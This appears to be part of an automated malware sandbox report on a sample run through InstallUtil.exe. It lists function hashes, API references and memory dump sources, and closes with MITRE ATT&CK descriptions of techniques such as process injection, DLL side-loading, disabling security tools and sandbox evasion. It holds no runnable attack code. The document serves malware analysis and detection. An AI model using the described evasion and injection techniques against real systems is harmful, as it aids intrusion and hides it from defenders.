Instruction ID: fbb1a5b25e055fb55eda80b4f4c69b463918d5d52f6ea5b0292e5872aa7777d5
Opcode Fuzzy Hash: 0d2479021207214fbeaf9f079fe7f1614d18f045ceb12e913cea9ce97200ce8f
Instruction Fuzzy Hash: 12B1F571E15329CFDF14CFA9D9446ADFBB2FB89302F20952AD409AB394E77499018F24

Function 014ED5EC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5525564701e63bdcd619e1c09829ea4bb2c37b08362aefd20570e6937764384
Instruction ID: 0a0070892f6abe324a68a4ebca86e6aa441552f4030d45cbca0cf13e8b30a2a3
Opcode Fuzzy Hash: b5525564701e63bdcd619e1c09829ea4bb2c37b08362aefd20570e6937764384
Instruction Fuzzy Hash: 97A16D32E0021A8FCF15DFB5C8485AEBBF2FF95301B15456AE909BB265DB31A916CF40

Function 014EF3D1 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b380f9c0098c9c520c46b5e14ceb198390f40637288da26595f2d1b2eff2bdfa
Instruction ID: 61202c9016948e05272ab395e0234fc25b36168cecb499c3793b7e720c2acc85
Opcode Fuzzy Hash: b380f9c0098c9c520c46b5e14ceb198390f40637288da26595f2d1b2eff2bdfa
Instruction Fuzzy Hash: 5DC1FCB24107458BE722DF66EA482897BF1FB85314F348319D1622B2F9D7B8568BCF44

Function 08F0A518 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a51a58ce01520824666dbd9414bba571d28580923834816bb95b115ff7d2a50
Instruction ID: e1356034888f315abe5f64ed119646fd8d74ed4c7ef9be66693823c6e4c774c4
Opcode Fuzzy Hash: 6a51a58ce01520824666dbd9414bba571d28580923834816bb95b115ff7d2a50
Instruction Fuzzy Hash: 65A12D71E05229DFDB14CFA9C580AAEFBB2FF89201F24C199D419A7355D7309A41DF60

Function 08F00013 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1170cc37413877a6e9e846033ac3ea4cba18c2a62d493217061db47d86339bff
Instruction ID: 7da68ca060f092f257fd665a2bbbc118c40c809ec6f54083d7e93081c63a6384
Opcode Fuzzy Hash: 1170cc37413877a6e9e846033ac3ea4cba18c2a62d493217061db47d86339bff
Instruction Fuzzy Hash: 76813335E11249DFCB08CFA9D48099EFBF2FF89211B14846AE418EB365DB30AA41CF51

Function 08F08A70 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8cc7de6ce346c0292221417515b308892740843b19aed9f6e69b86e30ae8438
Instruction ID: d7c558445b3c106bf8851f036cca5490e385bab690085375e0fc2454b64aae9e
Opcode Fuzzy Hash: f8cc7de6ce346c0292221417515b308892740843b19aed9f6e69b86e30ae8438
Instruction Fuzzy Hash: 57814BB0E15619DFDB24CFA9D980A9EFBB2FF88201F24C1A9D809A7355D7309A41DF50

Function 08F08A60 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf8b78909b4eec3b0c10c32872d8b1996b2e7f198958396e1b0ea9b60769084
Instruction ID: dee81ed36e12a428e406c825a9f328d21cea71a099d6247d56f9b00791405b45
Opcode Fuzzy Hash: caf8b78909b4eec3b0c10c32872d8b1996b2e7f198958396e1b0ea9b60769084
Instruction Fuzzy Hash: F4712CB0E156199FDB24CFA9C980A9EFBF2BF89201F24C1A9D809A7355D7309A41DF50

Function 08F00040 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd1f58d94c48bbcc6917cc1c87a3cf80b8a68d98c08f4ce73bf516853cfaaf54
Instruction ID: 71946dcdf5f8ce937f9462f31ee374584c2f5f2af5031f9acb6314dcae663e97
Opcode Fuzzy Hash: cd1f58d94c48bbcc6917cc1c87a3cf80b8a68d98c08f4ce73bf516853cfaaf54
Instruction Fuzzy Hash: F371E475E15609DFCB48CFA9D484A9EFBF1FF88211F148566E418AB364DB30AA41CF50

Function 08F02321 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057c4b4a08565195c0164fd4c6ee5e63ad9b79cdb072429c858dd0fcb488023a
Instruction ID: 918042bfc4ca7ec564e2506d046dc830786696a629f82ac63b30826c57869219
Opcode Fuzzy Hash: 057c4b4a08565195c0164fd4c6ee5e63ad9b79cdb072429c858dd0fcb488023a
Instruction Fuzzy Hash: 4C610871E157588BEB19CF7B88487CABFB3EFC5214F14C1AA844CAB225DB314A468F51

Function 08F05B68 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef949d36952174ffd04f852d5a94b2e1ac5693fad0fa40c8920bd94d36d1bd59
Instruction ID: e053bd0f9165c9bd31556aad3f68a8dbe3db371fbb3c68e4467ee732af5533a8
Opcode Fuzzy Hash: ef949d36952174ffd04f852d5a94b2e1ac5693fad0fa40c8920bd94d36d1bd59
Instruction Fuzzy Hash: 82514BB0E01219CFDB14CFAADA806AEFBB2FF89201F24C16AD419B7245D7745A41DF61

Function 08F05B58 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3ee9718ca2908dd3b25d2d41af3778cbbaef97869033f1f58f3cd7172deea7
Instruction ID: 09baaf6a6915dd9f66bdc49623fb3f48e688b88174efd0fe503135093fc459fb
Opcode Fuzzy Hash: ca3ee9718ca2908dd3b25d2d41af3778cbbaef97869033f1f58f3cd7172deea7
Instruction Fuzzy Hash: 0A513BB0E012198FDB14CFA9CA805AEFBB2FF89201F24C56AD419F7285D7745A42DF61

Function 08F023D0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7f9deba67f20d8563eea4edeb5c06595a8c6e411c4c5cd8cc528cb742dbcb6
Instruction ID: 43184a6eeb448b776dc0ab1829ee3854c0780bec5ccf7b513a4b0dba3477635f
Opcode Fuzzy Hash: 8e7f9deba67f20d8563eea4edeb5c06595a8c6e411c4c5cd8cc528cb742dbcb6
Instruction Fuzzy Hash: 9D514A71E107188BEB68DF6B9D4479EFAF3AFC8301F14C1BA850CA6254EB740A858F11

Function 08F01668 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c62b31c00bd97f7db9879cc054d79a43d96211db6320d7e32aa44628444167
Instruction ID: 91854fbe72c8576134af52972ea6d2862277a5465e33b3c6691164e74056ccd2
Opcode Fuzzy Hash: 01c62b31c00bd97f7db9879cc054d79a43d96211db6320d7e32aa44628444167
Instruction Fuzzy Hash: 1941F8B5E0160ADFDB04CFAAC9405AEFBF2EF89311F24C16AC405A7254E7309A919F94

Function 08F01678 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c56245bb0fb0d6125701e783d214ab8b86f78ae538c422b1ac6b4ee47ab07c
Instruction ID: 42d10e18f5ed7ade148afc6277cf833071a68d23fcf9c2241fb8778be33c8189
Opcode Fuzzy Hash: 82c56245bb0fb0d6125701e783d214ab8b86f78ae538c422b1ac6b4ee47ab07c
Instruction Fuzzy Hash: 8741B6B5E0120ADFDB44CFAAC9805AEFBF2AF88301F24C569C415A7254E7349A819F95

Function 08F01810 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed6db67767d9a4c78bb73f3b408d348f40cd988a70454766af3428a40774234
Instruction ID: f6c1d0e78efa14a2b984816710cdaf37bd1acde111d1eb810db47ba5e6543ae0
Opcode Fuzzy Hash: 5ed6db67767d9a4c78bb73f3b408d348f40cd988a70454766af3428a40774234
Instruction Fuzzy Hash: F011BDB1E056589FEB58CF6B98446DEFAF3AFC9200F14C07AC508A6264DB3405458F51

Function 01377CE0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 01377D1E
\;q, xrefs: 01377D12
\;q, xrefs: 01377CF6
\;q, xrefs: 01377CEC

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 5f3e47059cee25fe1ae1fd24f1965f7d0d98bde39d560f6ac3f9eae1d16898e0
Instruction ID: 83e5dc3195f539c462c62814b5691f115812b8c07d3a61825d54fb3fbee3ce1b
Opcode Fuzzy Hash: 5f3e47059cee25fe1ae1fd24f1965f7d0d98bde39d560f6ac3f9eae1d16898e0
Instruction Fuzzy Hash: 530144327001198FC7359E2DC948A3577EAEFC9A68729416AE506CB371EA35EC428750

Analysis Process: InstallUtil.exePID: 2436, Parent PID: 7312COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	55
Total number of Limit Nodes:	8

Executed Functions

Function 066653D0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

>I'L, xrefs: 066653FA

Memory Dump Source

Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd

Similarity

API ID:
String ID: >I'L
API String ID: 0-3948173599
Opcode ID: 1dd8998ca5443a2f348e5b8db37171336a6c74852cc439e3b1331d4fc85d0e95
Instruction ID: a3e4869159984beea6c37481fddae04db32668ec178902daca922d5c7c88187d
Opcode Fuzzy Hash: 1dd8998ca5443a2f348e5b8db37171336a6c74852cc439e3b1331d4fc85d0e95
Instruction Fuzzy Hash: 59F14730E00209DFEB54DFAAD949B9DBBF2BF88304F158559E406AF365DB70A945CB80

Function 06633CD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

>I'L, xrefs: 06633DC7

Memory Dump Source

Source File: 0000000A.00000002.2499567202.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6630000_InstallUtil.jbxd

Similarity

API ID:
String ID: >I'L
API String ID: 0-3948173599
Opcode ID: 8339f12bc5e652857a4d2d05e1ef122d42935bc7ba8577bdf545781fb3ea5a2d
Instruction ID: 670b62a08a8e92ef23130816b930c611d7ed78a098285338b24029d3dab01439
Opcode Fuzzy Hash: 8339f12bc5e652857a4d2d05e1ef122d42935bc7ba8577bdf545781fb3ea5a2d
Instruction Fuzzy Hash: 7D412131E043999FCB14DFA9D8006DEBBF9EF89210F15856AE404A7381DB789844CBE1

Function 06661080 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06661141

Strings

>I'L, xrefs: 06661097

Memory Dump Source

Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd

Similarity

API ID: CallProcWindow
String ID: >I'L
API String ID: 2714655100-3948173599
Opcode ID: 47eb8e965652958f50e007ca718936097ae006e7503ab9fd60550378ab7b22a5
Instruction ID: ec27aa0950df40999d11dcf0c008379bfd5561504425ab400086da6fe01a9334
Opcode Fuzzy Hash: 47eb8e965652958f50e007ca718936097ae006e7503ab9fd60550378ab7b22a5
Instruction Fuzzy Hash: FF4108B5A00309DFDB54CF5AC848AAAFBF5FF89314F24C459E519AB321D375A841CBA0

Function 02C1AE70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1AEFF

Strings

>I'L, xrefs: 02C1AE97

Memory Dump Source

Source File: 0000000A.00000002.2493662700.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2c10000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID: >I'L
API String ID: 3793708945-3948173599
Opcode ID: 7d892bc88b5628bd742eec0e2e6ac5910c2f5d7cdfd76d6e8db5fd350ac28d45
Instruction ID: 554a5d684cea99384febc67387faa6e7375c6f0e575ef95b21776a1e75539070
Opcode Fuzzy Hash: 7d892bc88b5628bd742eec0e2e6ac5910c2f5d7cdfd76d6e8db5fd350ac28d45
Instruction Fuzzy Hash: C32114B5D01248EFDB10CFAAD984ADEBBF4EB48310F14801AE914A7350C379A944CFA4

Function 02C1AE78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1AEFF

Strings

>I'L, xrefs: 02C1AE97

Memory Dump Source

Source File: 0000000A.00000002.2493662700.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2c10000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID: >I'L
API String ID: 3793708945-3948173599
Opcode ID: cfcc5430935e6d33697d2130007e401127d3d85649dda8192c61f01c3e89c0ea
Instruction ID: cf76fbc8a6b4f2a391eabc5f16f4697ffc70c8c21f3e70f76d2f0ddd12f57bc3
Opcode Fuzzy Hash: cfcc5430935e6d33697d2130007e401127d3d85649dda8192c61f01c3e89c0ea
Instruction Fuzzy Hash: 6621E4B5D01248DFDB10CFAAD584ADEBBF4EB48314F14801AE914A7350D379A940CF65

Function 06633DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06633D22), ref: 06633E0F

Strings

>I'L, xrefs: 06633DC7

Memory Dump Source

Source File: 0000000A.00000002.2499567202.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6630000_InstallUtil.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: >I'L
API String ID: 1890195054-3948173599
Opcode ID: 78ebb642cd5cdc672d04035e323945d84332b2aae1309d3496e590e36032ac9f
Instruction ID: 095929f37883016df045c277299962030444ddeaf72d9d859ec0894e651cbf24
Opcode Fuzzy Hash: 78ebb642cd5cdc672d04035e323945d84332b2aae1309d3496e590e36032ac9f
Instruction Fuzzy Hash: 1C1106B1C006699BDB14CF9AC944BDEFBF4EB48220F11812AD814B7341D778A945CFA5

Function 06633408 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06633D22), ref: 06633E0F

Strings

>I'L, xrefs: 06633DC7

Memory Dump Source

Source File: 0000000A.00000002.2499567202.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6630000_InstallUtil.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: >I'L
API String ID: 1890195054-3948173599
Opcode ID: ee177a071dee614ca3916b9fe1474c3f5dfba5a00593b0355af501c097e6db4a
Instruction ID: 5f46ca33198db2aed4ad7fc6f6f6071d0d6939608f0d37dfa8b4f3487365590e
Opcode Fuzzy Hash: ee177a071dee614ca3916b9fe1474c3f5dfba5a00593b0355af501c097e6db4a
Instruction Fuzzy Hash: 1211F2B1C006A99FDB10DF9AC544B9EFBF4EB48210F11812AE918B7340D778A951CFE5

Function 06664892 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 066648ED

Strings

>I'L, xrefs: 066648B2

Memory Dump Source

Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID: >I'L
API String ID: 2538663250-3948173599
Opcode ID: 82ab9fdea51f67baa027a7181fe2c842846d9ed80aa5336e5527e104804f88f9
Instruction ID: 36847a19156cc915a55d4264e2effb1f1b38a23b0f4fa335ead4f14a7b58148e
Opcode Fuzzy Hash: 82ab9fdea51f67baa027a7181fe2c842846d9ed80aa5336e5527e104804f88f9
Instruction Fuzzy Hash: 721153B5C00248CFDB20CFAAE485BDEBBF4EB48310F20841AE418A7710C378A944CFA4

Function 066639B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 066648ED

Strings

>I'L, xrefs: 066648B2

Memory Dump Source

Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID: >I'L
API String ID: 2538663250-3948173599
Opcode ID: 0f8543e37fcbf0e5c59176ce1af8af07672828645bbd1c4e7744116e86be511a
Instruction ID: c88e4d20532991a6cd3dbd8a57c456971da14090a20f50bde9615dd9cf2f45c6
Opcode Fuzzy Hash: 0f8543e37fcbf0e5c59176ce1af8af07672828645bbd1c4e7744116e86be511a
Instruction Fuzzy Hash: 1C1133B5C00748DFDB20DF9AD444B9EBBF4EB48210F208419E518A7310C379A940CFA5

Function 02B8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2493315262.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b8d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d146bf3b250850f8565b700a6aa7abf9f8dda2fc1d0bd06fc3f435e816f43f
Instruction ID: 524f4fb178bae296696fb2a7024d64b997dc983d5f816989b6835234ee16082b
Opcode Fuzzy Hash: 18d146bf3b250850f8565b700a6aa7abf9f8dda2fc1d0bd06fc3f435e816f43f
Instruction Fuzzy Hash: 0021D071604304EFDB14EF24D994B26BB65EB84314F20C5AEE80E4B2D6C336D847CA62

Function 02B8D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2493315262.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b8d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fb0069599902d7b2c271b3d3e03f5a00c9edb82187430b1d511a250a21d140
Instruction ID: 25aab654172161b092510dc5f9ac9538949c3dea88ac9949eb418f74c863d730
Opcode Fuzzy Hash: d9fb0069599902d7b2c271b3d3e03f5a00c9edb82187430b1d511a250a21d140
Instruction Fuzzy Hash: 6921CF75508380CFCB02CF20D9A0B15BF71EB45214F28C5EBD8498B6A3C33AD80ACB62

Function 0155D628 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2493168272.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_155d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0771e026573327eea076216102f7ad5b35ff390e3b1ed1384cd4fe657dcb8ce7
Instruction ID: 883e684a4584790bd8a2f26bef2020432c0772e040ceee011ead9f4fb173215e
Opcode Fuzzy Hash: 0771e026573327eea076216102f7ad5b35ff390e3b1ed1384cd4fe657dcb8ce7
Instruction Fuzzy Hash: 7DF06272405344EEEB208E1AD984B66FFE8EB41624F18C55BED0C5F287C2799844CAB1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
